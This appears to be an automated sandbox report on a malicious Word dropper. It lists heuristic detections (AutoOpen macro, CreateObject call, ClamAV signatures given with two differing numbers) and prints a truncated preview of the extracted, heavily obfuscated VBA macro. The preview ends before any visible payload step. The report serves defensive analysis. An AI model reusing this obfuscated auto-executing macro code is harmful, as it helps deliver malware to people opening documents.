MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing a VBA macro with an AutoOpen function, indicating it's designed to execute automatically upon opening. The macro utilizes CreateObject, a common technique for launching malicious payloads. ClamAV detection as 'Doc.Dropper.Agent-6592398-0' further confirms its malicious nature as a dropper.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6592264-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6592264-0
- VBA macros detected [medium, 3 related findings, OLE_VBA_MACROS]: Document contains VBA macro code
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 75857 bytes |

SHA-256 of macros.bas: 289740d54fe7d9bebfc8c5ff3c51bba16a33bc16f24b3688f604d1c6f0dcba05

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "hePtoDo"
Public Function UhyR1eb(ByRef XRhXTeFgz As String, ByVal uKn0nULZNlh As String) As String
Dim UYx5rMa() As Byte
Dim vG3FLs As String
vG3FLs = Application.UserName
Dim tiJ8nYhD As Collection
Dim Zt1aBhsh As Integer
While Len(vG3FLs) > 5
Zt1aBhsh = Zt1aBhsh + 5
YfhZENdtnI = Len(vG3FLs) - 8
Wend
If Len(Application.UserName) < 544 Then
Dim koao9Y3d7a As Collection
End If
If Application.UserName = "YoEynbp2Xwf" Then
MsgBox ("ZYQNjEDeRo5")
Else
Dim y8AhvSgg43co7w As String
y8AhvSgg43co7w = Application.UserName
End If
Dim ztK9nUX() As Byte
Dim ndzgBPTA As String
For AQdNeTWcrv = 0 To 5
ndzgBPTA = ndzgBPTA + "R"
Next AQdNeTWcrv
Dim aubWcgQl, VyQlIZD As Integer
aubWcgQl = 6 + 8
For jNtB5Sdq = 0 To 8
VyQlIZD = VyQlIZD + jNtB5Sdq
Next jNtB5Sdq
If VyQlIZD < jNtB5Sdq Then
Dim BOvWNFJGgK As Long
End If
For HJvaIVz0a = 0 To 9
yTLRtBiVYj = yTLRtBiVYj + HJvaIVz0a
Next HJvaIVz0a
Dim m703j9Z0 As Long
For ty0xS7du1V = 9 To 14
m703j9Z0 = m703j9Z0 + ty0xS7du1V
Next ty0xS7du1V
Dim Su62XmYKi, sF5xHh5F As Integer
Su62XmYKi = 5 + 7
For MfzrtB = 0 To 7
sF5xHh5F = sF5xHh5F + MfzrtB
Next MfzrtB
If sF5xHh5F < MfzrtB Then
Dim XOwLHRFaO As Long
End If
For HUM5pip3W = 0 To 8
ri7ICXo = ri7ICXo + HUM5pip3W
Next HUM5pip3W
Dim asuhtuxFwb As Long
Dim OpaQyIagv As Long
For YL6DGWLG = 5 To 16
OpaQyIagv = OpaQyIagv + YL6DGWLG
Next YL6DGWLG
Dim pAZxd3 As String
pAZxd3 = Application.UserName
Dim yTzxkTy As Collection
Dim rMfi6B1y As Integer
While Len(pAZxd3) > 7
rMfi6B1y = rMfi6B1y + 8
y1Lj5x8p = Len(pAZxd3) - 9
Wend
If Len(Application.UserName) < 529 Then
Dim cvS7mUv As Collection
End If
Dim MmNN3C78fxq As Long
For NR1Z94 = 0 To 5
SrubKFY = SrubKFY + NR1Z94
Next NR1Z94
Dim SC6GEwR7zw, Rv7ktg As Integer
SC6GEwR7zw = 8 + 6
For K3RWTRyt = 0 To 8
Rv7ktg = Rv7ktg + K3RWTRyt
Next K3RWTRyt
If Rv7ktg < K3RWTRyt Then
Dim Mvlhc7Q As Long
End If
Dim YJiw4S, zlj7LlE As Integer
YJiw4S = 5 + 7
For T4yUIahNyl = 0 To 5
zlj7LlE = zlj7LlE + T4yUIahNyl
Next T4yUIahNyl
If zlj7LlE < T4yUIahNyl Then
Dim iInNV5xfGs As Long
End If
For OFgRZ7OF5 = 0 To 9
RtIFbirS3 = RtIFbirS3 + OFgRZ7OF5
Next OFgRZ7OF5
If Application.UserName = "tvdu3clFTHP" Then
MsgBox ("GMDbeubUsS5")
Else
Dim fozEMKEyxSe01r As String
fozEMKEyxSe01r = Application.UserName
End If
If Application.UserName = "gct3QAyRQsc" Then
MsgBox ("KlXDU9WNu1K")
Else
Dim aK09H9wjble5aH As String
aK09H9wjble5aH = Application.UserName
End If
If Application.UserName = "P7iiyVxYZGT" Then
MsgBox ("OoBgoAUPy1s")
Else
Dim G5Tn8EUGYr3X91 As String
G5Tn8EUGYr3X91 = Application.UserName
End If
Dim jRWtctAx As Long
Dim Keb5MrSrw, NLLaqjxaST As Integer
Keb5MrSrw = 8 + 8
For Urib0TN3c = 0 To 8
NLLaqjxaST = NLLaqjxaST + Urib0TN3c
Next Urib0TN3c
If NLLaqjxaST < Urib0TN3c Then
Dim siwjUD8QE As Long
End If
If Application.UserName = "MhJTbuP1h6H" Then
MsgBox ("OYr1N8vP7WO")
Else
Dim h2PmB9HQpeRVrv As String
h2PmB9HQpeRVrv = Application.UserName
End If
If Len(Application.UserName) < 771 Then
Dim tb7RPdj As Collection
End If
If Len(Application.UserName) < 978 Then
Dim C8NmLJnt As Collection
End If
If Len(Application.UserName) < 494 Then
Dim ZYgo7Xm As Collection
End If
If Application.UserName = "Ou9Yf5v8VTb" Then
MsgBox ("HGiJBHQauln")
Else
Dim Hg7HK1UbTRYfh7 As String
Hg7HK1UbTRYfh7 = Application.UserName
End If
If Len(Application.UserName) < 515 Then
Dim dHeQytue As Collection
End If
Dim vnWPwZbUi As Long
Dim t1bDwI As String
For aO4tYyO = 0 To 5
t1bDwI = t1bDwI + "Y"
Next aO4tYyO
Dim Gys9U3R As String
For nDFgN7R = 0 To 5
Gys9U3R = Gys9U3R + "z"
Next nDFgN7R
Dim UTNXCQ56mQ As String
For agPRaA = 0 To 9
UTNXCQ56mQ = UTNXCQ56mQ + "W"
Next agPRaA
If Application.UserName = "q2zPQszwOib" Then
Ms
... (truncated)